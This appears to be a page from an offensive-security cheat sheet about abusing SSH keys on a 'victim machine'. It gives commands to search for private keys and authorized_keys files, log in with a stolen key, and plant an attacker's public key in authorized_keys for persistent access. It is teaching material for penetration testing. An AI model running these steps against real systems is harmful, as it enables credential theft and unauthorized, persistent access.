SSH Keys

id_rsa, id_rsa.pub, authorized_keys

What is SSH Keypair?

When we generate a SSH key using ssh-keygen, we are actually generating a RSA public/private key pair:

Public key: id_rsa.pub
Private key: id_rsa

SSH without password requires that your SSH public key id_rsa.pub is included in authorized_keys.

Enumeration

Search for SSH private key:

find / -name id_rsa 2>/dev/null

Search for authorized_keys (authroized public keys so that no password needed when SSH):

find / -name authorized_keys 2>/dev/null

SSH without Password

Once we get a SSH private key from the victim machine, we can try SSH in without password. Note that the public key must be recorded in authorized_keys.

Give appropriate permission to the private key:

chmod 600 id_rsa

SSH in:

ssh -i id_rsa <username>@<remote_ip>

~/.ssh/authozied_keys

If ~/.ssh/authozied_keys is writable on the victim machine, we can generate a SSH keypair and add the generated public key to this file. This will allow us to SSH into the victim machine using the generated private key.

Generate a SSH keypair on the attack machine:

ssh-keygen -f mykey

Add mykey.pub to ~/.ssh/authozied_keys on the victim machine:

echo "<mykey.pub>" >> ~/.ssh/authorized_keys

Give appropriate permission to the private key:

chmod 600 mykey

SSH in:

ssh -i mykey <username>@<remote_ip>

PreviousPasswords and File Permissions NextSudo

Last updated 3 years ago

Was this helpful?